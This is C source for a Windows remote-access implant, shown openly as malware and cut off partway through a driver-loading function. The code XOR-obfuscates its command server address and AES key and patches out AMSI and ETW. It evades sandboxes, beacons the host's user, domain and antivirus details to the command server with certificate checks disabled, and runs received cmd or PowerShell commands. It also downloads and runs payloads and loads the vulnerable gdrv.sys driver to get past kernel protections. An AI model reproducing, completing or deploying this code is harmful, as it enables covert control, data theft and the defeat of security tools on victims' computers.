#define _CRT_SECURE_NO_WARNINGS #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #pragma comment(lib, "advapi32.lib") #pragma comment(lib, "user32.lib") #pragma comment(lib, "wbemuuid.lib") #pragma comment(lib, "ole32.lib") #pragma comment(lib, "crypt32.lib") #pragma comment(lib, "ntdll.lib") #pragma comment(lib, "bcrypt.lib") #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "winhttp.lib") #pragma comment(lib, "iphlpapi.lib") #pragma comment(lib, "shlwapi.lib") #pragma comment(lib, "shell32.lib") // ==================== XOR OBFUSCATION ==================== #define XOR_KEY 0xDD VOID ObfuscateStr(PCHAR buf, SIZE_T len) { for (SIZE_T i = 0; i < len; i++) buf[i] ^= XOR_KEY; } // Obfuscated C2 server - https://your-c2-server.com/beacon (XORed) CHAR g_c2_server_obf[] = "\x78\x9D\x9D\x9A\x9B\x9C\xA9\xE1\x9B\xA9\x9B\x9A\xA9\x96\x9A\x9B\x9C\xA9\xB6\x9B\x98\x9C\xA9\xA9\xE9\xA9\x98\x9A\x9C\x9B\x98\xA9\x98\x99\x9A\x9B\x9C"; CHAR g_aes_key_obf[] = "\xAB\xAA\xA8\xA3\xA7\xB6\xA8\xF5\xA8\xB3\xB4\xA8\xAB\xAA\xA8\xA3\xA7\xB6\xA8\xF5\xA8\xB3\xB4\xA8\xAA\xA5\xB1\xA7\xA5\xAD\xB4\x23"; CHAR g_aes_iv_obf[] = "\xB1\xB8\xB7\xAF\xB2\xB9\xA5\xA7\xA8\xB9\xA7\xA6\xF5\xF4\xF4\x23"; CHAR g_mutex_name_obf[] = "\x9A\x9D\x9A\x9D\x9A\x8F\x9A\x9D\x9A\x9D\x9A\x8F\x9A\x9D\x9A\x9D\x23"; CHAR g_c2_server[256] = {0}; CHAR g_aes_key[64] = {0}; CHAR g_aes_iv[32] = {0}; CHAR g_mutex_name[64] = {0}; VOID InitObfuscatedStrings() { CHAR tmp[256]; memcpy(tmp, g_c2_server_obf, sizeof(g_c2_server_obf)); ObfuscateStr(tmp, sizeof(g_c2_server_obf) - 1); strncpy(g_c2_server, tmp, 255); memcpy(tmp, g_aes_key_obf, sizeof(g_aes_key_obf)); ObfuscateStr(tmp, sizeof(g_aes_key_obf) - 1); strncpy(g_aes_key, tmp, 63); memcpy(tmp, g_aes_iv_obf, sizeof(g_aes_iv_obf)); ObfuscateStr(tmp, sizeof(g_aes_iv_obf) - 1); strncpy(g_aes_iv, tmp, 31); memcpy(tmp, g_mutex_name_obf, sizeof(g_mutex_name_obf)); ObfuscateStr(tmp, sizeof(g_mutex_name_obf) - 1); strncpy(g_mutex_name, tmp, 63); } // ==================== CONSTANTS ==================== #define C2_BASE_INTERVAL_SECONDS 60 #define C2_JITTER_MAX_SECONDS 120 #define GDRV_DEVICE_NAME L"\\\\.\\GIO" #define GDRV_IOCTL_READ_MSR 0x9C402470 #define GDRV_IOCTL_WRITE_MSR 0x9C402474 #define GDRV_IOCTL_READ_PHYSICAL 0x9C402478 #define GDRV_IOCTL_WRITE_PHYSICAL 0x9C40247C #define IA32_EFER 0xC0000080 #define CI_OPTIONS_DISABLE_DSE 0x6 #define ETW_EVENT_WRITE_HASH 0x1B7E0F38 #define AMSI_SCAN_BUFFER_HASH 0x1B7E0F37 // ==================== STRUCTURES ==================== typedef struct _BEACON_DATA { WCHAR ComputerName[MAX_COMPUTERNAME_LENGTH + 1]; WCHAR UserName[256]; DWORD ProcessId; WCHAR OSVersion[128]; BOOL IsAdmin; WCHAR ExePath[MAX_PATH]; DWORD DefenderStatus; DWORD Uptime; DWORD InstallDate; DWORD LastBootTime; WCHAR AntivirusProduct[256]; WCHAR DomainName[256]; } BEACON_DATA, *PBEACON_DATA; typedef struct _C2_TASK { DWORD TaskId; WCHAR Command[1024]; WCHAR Arguments[2048]; BOOL IsPowerShell; BOOL WaitForOutput; BOOL IsDownload; WCHAR DownloadURL[1024]; WCHAR DownloadPath[MAX_PATH]; } C2_TASK, *PC2_TASK; typedef struct _PS_PROTECTION { UCHAR Level; } PS_PROTECTION, *PPS_PROTECTION; typedef struct _C2_ENDPOINT { WCHAR host[128]; WCHAR path[128]; INTERNET_PORT port; } C2_ENDPOINT; typedef struct _KERNEL_MODULE_INFO { ULONGLONG Base; ULONGLONG Size; CHAR Name[256]; } KERNEL_MODULE_INFO, *PKERNEL_MODULE_INFO; typedef enum _PROCESSINFOCLASS { ProcessProtectionInformation = 0x3D, ProcessHandleInformation = 0x51 } PROCESSINFOCLASS; typedef struct _SYSTEM_HANDLE_ENTRY { ULONG OwnerPid; BYTE ObjectType; BYTE HandleFlags; USHORT HandleValue; PVOID ObjectPointer; ACCESS_MASK GrantedAccess; } SYSTEM_HANDLE_ENTRY, *PSYSTEM_HANDLE_ENTRY; typedef struct _SYSTEM_HANDLE_INFORMATION { ULONG Count; SYSTEM_HANDLE_ENTRY Handle[1]; } SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION; typedef NTSTATUS (NTAPI *pNtSetInformationProcess)(HANDLE, DWORD, PVOID, ULONG); typedef NTSTATUS (NTAPI *pNtQueryInformationProcess)(HANDLE, DWORD, PVOID, ULONG, PULONG); typedef NTSTATUS (NTAPI *pNtQuerySystemInformation)(DWORD, PVOID, ULONG, PULONG); typedef NTSTATUS (NTAPI *pNtDuplicateObject)(HANDLE, HANDLE, HANDLE, PHANDLE, ACCESS_MASK, ULONG, ULONG); typedef NTSTATUS (NTAPI *pNtSuspendProcess)(HANDLE); typedef NTSTATUS (NTAPI *pNtResumeProcess)(HANDLE); typedef NTSTATUS (NTAPI *pNtReadVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG); typedef NTSTATUS (NTAPI *pNtWriteVirtualMemory)(HANDLE, PVOID, PVOID, ULONG, PULONG); // ==================== GLOBALS ==================== C2_ENDPOINT g_C2Fallbacks[5] = {0}; int g_C2Count = 0; int g_C2Current = 0; HANDLE g_hMutex = NULL; pNtQuerySystemInformation NtQuerySystemInformation = NULL; pNtDuplicateObject NtDuplicateObject = NULL; pNtSuspendProcess NtSuspendProcess = NULL; pNtResumeProcess NtResumeProcess = NULL; pNtReadVirtualMemory NtReadVirtualMemory = NULL; pNtWriteVirtualMemory NtWriteVirtualMemory = NULL; // ==================== FORWARD DECLARATIONS ==================== ULONGLONG FindPattern(BYTE* base, DWORD size, BYTE* pattern, DWORD patternLen); ULONGLONG WalkPageTable(PVOID virtualAddr); BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen); BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen); BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task); DWORD WINAPI BeaconThread(LPVOID lpParam); BOOL PatchAmsi(void); BOOL PatchEtw(void); BOOL IsSandboxed(void); BOOL EnableDebugPrivilege(void); BOOL KillProcessByName(LPCWSTR processName); BOOL HideFile(LPCWSTR filePath); BOOL ClearEventLogs(void); BOOL AddToStartup(LPCWSTR appPath); BOOL ExecuteWMIQuery(LPCWSTR query, BSTR* result); BOOL BypassUAC(void); BOOL InstallServicePersistence(void); BOOL InfectMbr(BYTE* payload, DWORD payloadSize); BOOL CreateRegistryKey(LPCWSTR keyPath, LPCWSTR valueName, DWORD valueData); BOOL DeleteRegistryKey(LPCWSTR keyPath); BOOL DisableFirewall(void); BOOL AddExclusionToDefender(LPCWSTR path); BOOL EnumSecurityProducts(WCHAR* output, DWORD outputSize); BOOL SelfDelete(void); BOOL ProcessHollowing(LPCWSTR targetProcess, LPCWSTR payloadPath); BOOL TokenStealing(void); BOOL RunPE(BYTE* peData, DWORD peSize); BOOL DownloadFile(LPCWSTR url, LPCWSTR outputPath); BOOL ExecuteCommand(PC2_TASK task, WCHAR* output, DWORD outputSize); // ==================== NT FUNCTION INITIALIZATION ==================== VOID InitNtFunctions() { HMODULE hNtdll = GetModuleHandleW(L"ntdll.dll"); if (hNtdll) { NtQuerySystemInformation = (pNtQuerySystemInformation)GetProcAddress(hNtdll, "NtQuerySystemInformation"); NtDuplicateObject = (pNtDuplicateObject)GetProcAddress(hNtdll, "NtDuplicateObject"); NtSuspendProcess = (pNtSuspendProcess)GetProcAddress(hNtdll, "NtSuspendProcess"); NtResumeProcess = (pNtResumeProcess)GetProcAddress(hNtdll, "NtResumeProcess"); NtReadVirtualMemory = (pNtReadVirtualMemory)GetProcAddress(hNtdll, "NtReadVirtualMemory"); NtWriteVirtualMemory = (pNtWriteVirtualMemory)GetProcAddress(hNtdll, "NtWriteVirtualMemory"); } } // ==================== SINGLE INSTANCE ==================== BOOL EnsureSingleInstance() { HANDLE hMutex = CreateMutexW(NULL, TRUE, (LPCWSTR)g_mutex_name); if (GetLastError() == ERROR_ALREADY_EXISTS) { if (hMutex) CloseHandle(hMutex); return FALSE; } g_hMutex = hMutex; return TRUE; } // ==================== DEBUG PRIVILEGE ==================== BOOL EnableDebugPrivilege() { HANDLE hToken; if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken)) return FALSE; TOKEN_PRIVILEGES tp; LUID luid; if (!LookupPrivilegeValueW(NULL, SE_DEBUG_NAME, &luid)) { CloseHandle(hToken); return FALSE; } tp.PrivilegeCount = 1; tp.Privileges[0].Luid = luid; tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; BOOL result = AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL); CloseHandle(hToken); return result; } // ==================== UTILITY ==================== void ElevateSelf() { BOOL isElevated = FALSE; HANDLE hToken = NULL; if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) { TOKEN_ELEVATION elev; DWORD size = sizeof(TOKEN_ELEVATION); if (GetTokenInformation(hToken, TokenElevation, &elev, size, &size)) isElevated = elev.TokenIsElevated; CloseHandle(hToken); } if (!isElevated) { wchar_t exePath[MAX_PATH]; GetModuleFileNameW(NULL, exePath, MAX_PATH); SHELLEXECUTEINFOW sei = { sizeof(sei) }; sei.lpVerb = L"runas"; sei.lpFile = exePath; sei.nShow = SW_HIDE; if (ShellExecuteExW(&sei)) ExitProcess(0); else ExitProcess(1); } } // ==================== AMSI BYPASS ==================== BOOL PatchAmsi() { HMODULE hAmsi = GetModuleHandleW(L"amsi.dll"); if (!hAmsi) return FALSE; FARPROC pAmsiScanBuf = GetProcAddress(hAmsi, "AmsiScanBuffer"); if (!pAmsiScanBuf) return FALSE; BYTE patch[] = { 0xB8, 0x00, 0x00, 0x00, 0x00, 0xC3 }; DWORD oldProtect; if (!VirtualProtect(pAmsiScanBuf, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect)) return FALSE; memcpy(pAmsiScanBuf, patch, sizeof(patch)); VirtualProtect(pAmsiScanBuf, sizeof(patch), oldProtect, &oldProtect); FlushInstructionCache(GetCurrentProcess(), pAmsiScanBuf, sizeof(patch)); return TRUE; } // ==================== ETW BYPASS ==================== BOOL PatchEtw() { HMODULE hNtDll = GetModuleHandleW(L"ntdll.dll"); if (!hNtDll) return FALSE; FARPROC pEtwEventWrite = GetProcAddress(hNtDll, "EtwEventWrite"); if (!pEtwEventWrite) return FALSE; BYTE patch[] = { 0x31, 0xC0, 0xC3 }; DWORD oldProtect; if (!VirtualProtect(pEtwEventWrite, sizeof(patch), PAGE_EXECUTE_READWRITE, &oldProtect)) return FALSE; memcpy(pEtwEventWrite, patch, sizeof(patch)); VirtualProtect(pEtwEventWrite, sizeof(patch), oldProtect, &oldProtect); FlushInstructionCache(GetCurrentProcess(), pEtwEventWrite, sizeof(patch)); return TRUE; } // ==================== SANDBOX DETECTION ==================== BOOL IsSandboxed() { ULARGE_INTEGER freeBytes, totalBytes; if (GetDiskFreeSpaceExW(L"C:\\", &freeBytes, &totalBytes, NULL)) { if (totalBytes.QuadPart < 64424509440ULL) return TRUE; } MEMORYSTATUSEX memStatus = { sizeof(memStatus) }; if (GlobalMemoryStatusEx(&memStatus)) { if (memStatus.ullTotalPhys < 4294967296ULL) return TRUE; } WCHAR computerName[MAX_COMPUTERNAME_LENGTH + 1]; DWORD size = MAX_COMPUTERNAME_LENGTH + 1; if (GetComputerNameW(computerName, &size)) { LPCWSTR names[] = { L"SANDBOX", L"VIRUS", L"MALWARE", L"TEST", L"WIN-", L"7SILVER", L"CODER", L"DEBUG", L"ANALYSIS" }; for (int i = 0; i < 9; i++) { if (wcsstr(computerName, names[i])) return TRUE; } } if (GetTickCount64() < 600000) return TRUE; SYSTEM_POWER_STATUS power; GetSystemPowerStatus(&power); if (power.BatteryFlag != 128) return TRUE; if (IsDebuggerPresent()) return TRUE; return FALSE; } // ==================== C2 FALLBACK PARSING ==================== VOID ParseC2Server() { CHAR* hostStart = strstr(g_c2_server, "://"); if (!hostStart) return; hostStart += 3; size_t len = strlen(hostStart); for (size_t i = 0; i < len && i < 127; i++) { g_C2Fallbacks[0].host[i] = (WCHAR)hostStart[i]; } g_C2Fallbacks[0].port = INTERNET_DEFAULT_HTTPS_PORT; wcscpy(g_C2Fallbacks[0].path, L"/beacon"); g_C2Count = 1; wcscpy(g_C2Fallbacks[1].host, L"cloudflare-dns.com"); g_C2Fallbacks[1].port = 443; wcscpy(g_C2Fallbacks[1].path, L"/dns-query"); wcscpy(g_C2Fallbacks[2].host, L"dns.google"); g_C2Fallbacks[2].port = 443; wcscpy(g_C2Fallbacks[2].path, L"/resolve"); g_C2Count = 3; } // ==================== CRYPTOGRAPHY ==================== BOOL AesEncrypt(BYTE* plaintext, DWORD plaintextLen, BYTE** ciphertext, DWORD* ciphertextLen) { BCRYPT_ALG_HANDLE hAlg = NULL; BCRYPT_KEY_HANDLE hKey = NULL; if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) return FALSE; BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0); BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, strlen(g_aes_key), 0); DWORD paddedLen = ((plaintextLen + 15) / 16) * 16; *ciphertextLen = paddedLen + 16; *ciphertext = (BYTE*)malloc(*ciphertextLen); if (!*ciphertext) { BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); return FALSE; } NTSTATUS status = BCryptEncrypt(hKey, plaintext, plaintextLen, NULL, (PUCHAR)g_aes_iv, strlen(g_aes_iv), *ciphertext, *ciphertextLen, ciphertextLen, BCRYPT_BLOCK_PADDING); BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); return BCRYPT_SUCCESS(status); } BOOL AesDecrypt(BYTE* ciphertext, DWORD ciphertextLen, BYTE** plaintext, DWORD* plaintextLen) { BCRYPT_ALG_HANDLE hAlg = NULL; BCRYPT_KEY_HANDLE hKey = NULL; if (!BCRYPT_SUCCESS(BCryptOpenAlgorithmProvider(&hAlg, BCRYPT_AES_ALGORITHM, NULL, 0))) return FALSE; BCryptSetProperty(hAlg, BCRYPT_CHAINING_MODE, (PUCHAR)BCRYPT_CHAIN_MODE_CBC, sizeof(BCRYPT_CHAIN_MODE_CBC), 0); BCryptGenerateSymmetricKey(hAlg, &hKey, NULL, 0, (PUCHAR)g_aes_key, strlen(g_aes_key), 0); *plaintextLen = ciphertextLen; *plaintext = (BYTE*)malloc(*plaintextLen + 1); if (!*plaintext) return FALSE; NTSTATUS status = BCryptDecrypt(hKey, ciphertext, ciphertextLen, NULL, (PUCHAR)g_aes_iv, strlen(g_aes_iv), *plaintext, *plaintextLen, plaintextLen, BCRYPT_BLOCK_PADDING); BCryptDestroyKey(hKey); BCryptCloseAlgorithmProvider(hAlg, 0); if (BCRYPT_SUCCESS(status)) (*plaintext)[*plaintextLen] = 0; return BCRYPT_SUCCESS(status); } // ==================== BEACON DATA ==================== void GatherBeaconData(PBEACON_DATA beacon) { DWORD size = MAX_COMPUTERNAME_LENGTH + 1; GetComputerNameW(beacon->ComputerName, &size); DWORD userSize = 256; GetUserNameW(beacon->UserName, &userSize); beacon->ProcessId = GetCurrentProcessId(); beacon->IsAdmin = IsUserAnAdmin(); GetModuleFileNameW(NULL, beacon->ExePath, MAX_PATH); beacon->Uptime = GetTickCount64() / 1000; RTL_OSVERSIONINFOW osvi = { sizeof(osvi) }; RtlGetVersion(&osvi); swprintf(beacon->OSVersion, 128, L"%d.%d.%d Build %d", osvi.dwMajorVersion, osvi.dwMinorVersion, osvi.dwBuildNumber, osvi.dwBuildNumber); HKEY hKey; beacon->DefenderStatus = 2; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender\\Real-Time Protection", 0, KEY_READ, &hKey) == ERROR_SUCCESS) { DWORD value = 0, valueSize = sizeof(value); RegQueryValueExW(hKey, L"DisableRealtimeMonitoring", NULL, NULL, (LPBYTE)&value, &valueSize); beacon->DefenderStatus = value; RegCloseKey(hKey); } // Get Windows install date HKEY hKeySetup; if (RegOpenKeyExW(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", 0, KEY_READ, &hKeySetup) == ERROR_SUCCESS) { DWORD installDate = 0; DWORD dataSize = sizeof(installDate); RegQueryValueExW(hKeySetup, L"InstallDate", NULL, NULL, (LPBYTE)&installDate, &dataSize); beacon->InstallDate = installDate; RegCloseKey(hKeySetup); } // Get domain name DWORD domainSize = 256; GetComputerNameExW(ComputerNameDnsDomain, beacon->DomainName, &domainSize); if (wcslen(beacon->DomainName) == 0) wcscpy(beacon->DomainName, L"WORKGROUP"); // Get antivirus products EnumSecurityProducts(beacon->AntivirusProduct, 256); } BOOL EnumSecurityProducts(WCHAR* output, DWORD outputSize) { output[0] = 0; HRESULT hr = CoInitializeEx(NULL, COINIT_APARTMENTTHREADED); if (FAILED(hr)) return FALSE; IWbemLocator* pLoc = NULL; IWbemServices* pSvc = NULL; hr = CoCreateInstance(CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER, IID_IWbemLocator, (LPVOID*)&pLoc); if (SUCCEEDED(hr)) { hr = pLoc->ConnectServer(_bstr_t(L"ROOT\\SecurityCenter2"), NULL, NULL, 0, NULL, 0, 0, &pSvc); if (SUCCEEDED(hr)) { hr = CoSetProxyBlanket(pSvc, RPC_C_AUTHN_WINNT, RPC_C_AUTHZ_NONE, NULL, RPC_C_AUTHN_LEVEL_CALL, RPC_C_IMP_LEVEL_IMPERSONATE, NULL, EOAC_NONE); IEnumWbemClassObject* pEnumerator = NULL; hr = pSvc->ExecQuery(bstr_t("WQL"), bstr_t("SELECT * FROM AntiVirusProduct"), WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY, NULL, &pEnumerator); if (SUCCEEDED(hr) && pEnumerator) { IWbemClassObject* pclsObj = NULL; ULONG uReturn = 0; while (pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn) == S_OK) { VARIANT vtProp; if (SUCCEEDED(pclsObj->Get(L"displayName", 0, &vtProp, 0, 0))) { wcsncat(output, vtProp.bstrVal, outputSize - wcslen(output) - 1); wcsncat(output, L"; ", outputSize - wcslen(output) - 1); VariantClear(&vtProp); } pclsObj->Release(); } pEnumerator->Release(); } pSvc->Release(); } pLoc->Release(); } CoUninitialize(); return wcslen(output) > 0; } // ==================== USER AGENT POOL ==================== LPCWSTR UAPool[] = { L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/125.0.0.0 Safari/537.36", L"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0", L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/124.0.0.0 Safari/537.36 Edg/124.0.0.0", L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/126.0.0.0 Safari/537.36", L"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0", L"Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14", L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0" }; // ==================== C2 COMMUNICATION ==================== BOOL SendBeaconToC2(PBEACON_DATA beacon, PC2_TASK task) { char json[8192]; snprintf(json, sizeof(json), "{\"computer\":\"%ls\",\"user\":\"%ls\",\"pid\":%d,\"os\":\"%ls\"," "\"admin\":%s,\"path\":\"%ls\",\"defender\":%d,\"uptime\":%d," "\"install_date\":%d,\"domain\":\"%ls\",\"av\":\"%ls\"}", beacon->ComputerName, beacon->UserName, beacon->ProcessId, beacon->OSVersion, beacon->IsAdmin ? "true" : "false", beacon->ExePath, beacon->DefenderStatus, beacon->Uptime, beacon->InstallDate, beacon->DomainName, beacon->AntivirusProduct); BYTE* encrypted = NULL; DWORD encryptedLen = 0; if (!AesEncrypt((BYTE*)json, strlen(json), &encrypted, &encryptedLen)) return FALSE; DWORD base64Len = 0; CryptBinaryToStringA(encrypted, encryptedLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, NULL, &base64Len); char* b64 = (char*)malloc(base64Len + 1); if (!b64) { free(encrypted); return FALSE; } CryptBinaryToStringA(encrypted, encryptedLen, CRYPT_STRING_BASE64 | CRYPT_STRING_NOCRLF, b64, &base64Len); int uaIndex = rand() % (sizeof(UAPool) / sizeof(UAPool[0])); BOOL result = FALSE; for (int c2try = 0; c2try < max(1, g_C2Count); c2try++) { int idx = (g_C2Current + c2try) % max(1, g_C2Count); HINTERNET hSession = WinHttpOpen(UAPool[uaIndex], WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); if (!hSession) continue; DWORD secFlags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_WRONG_USAGE | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID; WinHttpSetOption(hSession, WINHTTP_OPTION_SECURITY_FLAGS, &secFlags, sizeof(secFlags)); HINTERNET hConnect = WinHttpConnect(hSession, g_C2Fallbacks[idx].host, g_C2Fallbacks[idx].port, 0); if (!hConnect) { WinHttpCloseHandle(hSession); continue; } HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"POST", g_C2Fallbacks[idx].path, NULL, NULL, NULL, WINHTTP_FLAG_SECURE); if (!hRequest) { WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); continue; } char postData[8192]; snprintf(postData, sizeof(postData), "d=%s", b64); if (WinHttpSendRequest(hRequest, L"Content-Type: application/x-www-form-urlencoded", 0, (LPVOID)postData, strlen(postData), strlen(postData), 0)) { if (WinHttpReceiveResponse(hRequest, NULL)) { char response[16384] = {0}; DWORD bytesRead = 0; WinHttpReadData(hRequest, response, sizeof(response) - 1, &bytesRead); char* body = strstr(response, "\r\n\r\n"); if (body) body += 4; else body = response; if (strlen(body) > 0) { BYTE* decrypted = NULL; DWORD decryptedLen = 0; if (AesDecrypt((BYTE*)body, (DWORD)strlen(body), &decrypted, &decryptedLen)) { char* taskIdStr = strstr((char*)decrypted, "\"task_id\""); if (taskIdStr) { char* valStart = strchr(taskIdStr, ':'); if (valStart) { valStart++; while (*valStart == ' ' || *valStart == '\"') valStart++; int taskId = atoi(valStart); if (taskId != 0) { char* cmdStr = strstr((char*)decrypted, "\"command\""); if (cmdStr) { valStart = strchr(cmdStr, ':'); if (valStart) { valStart++; while (*valStart == ' ' || *valStart == '\"') valStart++; char* end = strchr(valStart, '\"'); if (end) *end = 0; MultiByteToWideChar(CP_UTF8, 0, valStart, -1, task->Command, 1024); task->TaskId = taskId; task->WaitForOutput = TRUE; } } char* downloadStr = strstr((char*)decrypted, "\"download\""); if (downloadStr) { task->IsDownload = TRUE; char* urlStart = strchr(downloadStr, ':'); if (urlStart) { urlStart++; while (*urlStart == ' ' || *urlStart == '\"') urlStart++; char* urlEnd = strchr(urlStart, '\"'); if (urlEnd) *urlEnd = 0; MultiByteToWideChar(CP_UTF8, 0, urlStart, -1, task->DownloadURL, 1024); wcscpy(task->DownloadPath, L"C:\\Windows\\Temp\\payload.exe"); } } } } } free(decrypted); } } result = TRUE; } } WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); if (result) { g_C2Current = (idx + 1) % max(1, g_C2Count); break; } } free(encrypted); free(b64); return result; } // ==================== DOWNLOAD AND EXECUTE ==================== BOOL DownloadFile(LPCWSTR url, LPCWSTR outputPath) { HINTERNET hSession = WinHttpOpen(L"Church/1.0", WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0); if (!hSession) return FALSE; HINTERNET hConnect = WinHttpConnect(hSession, url, INTERNET_DEFAULT_HTTPS_PORT, 0); if (!hConnect) { WinHttpCloseHandle(hSession); return FALSE; } HINTERNET hRequest = WinHttpOpenRequest(hConnect, L"GET", NULL, NULL, NULL, NULL, WINHTTP_FLAG_SECURE); if (!hRequest) { WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return FALSE; } if (!WinHttpSendRequest(hRequest, NULL, 0, NULL, 0, 0, 0)) { WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return FALSE; } if (!WinHttpReceiveResponse(hRequest, NULL)) { WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return FALSE; } HANDLE hFile = CreateFileW(outputPath, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL); if (hFile == INVALID_HANDLE_VALUE) { WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return FALSE; } DWORD bytesRead = 0; BYTE buffer[4096]; while (WinHttpReadData(hRequest, buffer, sizeof(buffer), &bytesRead) && bytesRead > 0) { DWORD bytesWritten; WriteFile(hFile, buffer, bytesRead, &bytesWritten, NULL); } CloseHandle(hFile); WinHttpCloseHandle(hRequest); WinHttpCloseHandle(hConnect); WinHttpCloseHandle(hSession); return TRUE; } // ==================== COMMAND EXECUTION ==================== BOOL ExecuteCommand(PC2_TASK task, WCHAR* output, DWORD outputSize) { if (task->IsDownload && task->DownloadURL[0] != 0) { if (DownloadFile(task->DownloadURL, task->DownloadPath)) { PROCESS_INFORMATION pi; STARTUPINFOW si = { sizeof(si) }; CreateProcessW(task->DownloadPath, NULL, NULL, NULL, FALSE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); if (pi.hProcess) CloseHandle(pi.hProcess); if (pi.hThread) CloseHandle(pi.hThread); wcscpy(output, L"Download and execution completed"); return TRUE; } wcscpy(output, L"Download failed"); return FALSE; } SECURITY_ATTRIBUTES sa = { sizeof(sa), NULL, TRUE }; HANDLE hStdOutRead, hStdOutWrite; if (!CreatePipe(&hStdOutRead, &hStdOutWrite, &sa, 0)) return FALSE; SetHandleInformation(hStdOutRead, HANDLE_FLAG_INHERIT, 0); PROCESS_INFORMATION pi = {0}; STARTUPINFOW si = {0}; si.cb = sizeof(si); si.dwFlags = STARTF_USESTDHANDLES; si.hStdOutput = hStdOutWrite; si.hStdError = hStdOutWrite; si.hStdInput = NULL; WCHAR cmdLine[4096]; if (task->IsPowerShell) { swprintf(cmdLine, 4096, L"powershell.exe -Command \"%s %s\"", task->Command, task->Arguments); } else { swprintf(cmdLine, 4096, L"cmd.exe /c %s %s", task->Command, task->Arguments); } BOOL success = CreateProcessW(NULL, cmdLine, NULL, NULL, TRUE, CREATE_NO_WINDOW, NULL, NULL, &si, &pi); CloseHandle(hStdOutWrite); if (success && task->WaitForOutput) { WaitForSingleObject(pi.hProcess, 60000); DWORD bytesRead; ReadFile(hStdOutRead, output, outputSize - sizeof(WCHAR), &bytesRead, NULL); output[bytesRead / sizeof(WCHAR)] = 0; } CloseHandle(hStdOutRead); if (pi.hProcess) CloseHandle(pi.hProcess); if (pi.hThread) CloseHandle(pi.hThread); return success; } // ==================== BEACON THREAD ==================== DWORD WINAPI BeaconThread(LPVOID lpParam) { BEACON_DATA beacon; C2_TASK task = {0}; while (TRUE) { ZeroMemory(&beacon, sizeof(beacon)); ZeroMemory(&task, sizeof(task)); GatherBeaconData(&beacon); if (SendBeaconToC2(&beacon, &task) && (task.Command[0] != 0 || task.IsDownload)) { WCHAR output[65536]; ZeroMemory(output, sizeof(output)); ExecuteCommand(&task, output, sizeof(output)); } DWORD sleepTime = (C2_BASE_INTERVAL_SECONDS + (rand() % C2_JITTER_MAX_SECONDS)) * 1000; Sleep(sleepTime); } return 0; } // ==================== KERNEL BYPASS ==================== BOOL LoadGdrvDriver() { if (!CopyFileW(L"gdrv.sys", L"C:\\Windows\\Temp\\gdrv.sys", FALSE)) return FALSE; SC_HANDLE scm = OpenSCManagerW(NULL, NULL, SC_MANAGER_ALL_ACCESS); if (!scm) return FALSE; SC_HANDLE svc = CreateServiceW(scm, L"gdrv", L"gdrv", SERVICE_START | SERVICE_STOP | DELETE, SERVICE_KERNEL_DRIVER, SERVICE_DEMAND_START, SERVICE_ERROR_IGNORE, L"C:\\Windows\\Temp\\gdrv.sys", NULL, NULL, NULL, NULL, NULL); if (!svc && GetLastError() == ERROR_SERVICE_EXISTS) svc = OpenServiceW(scm, 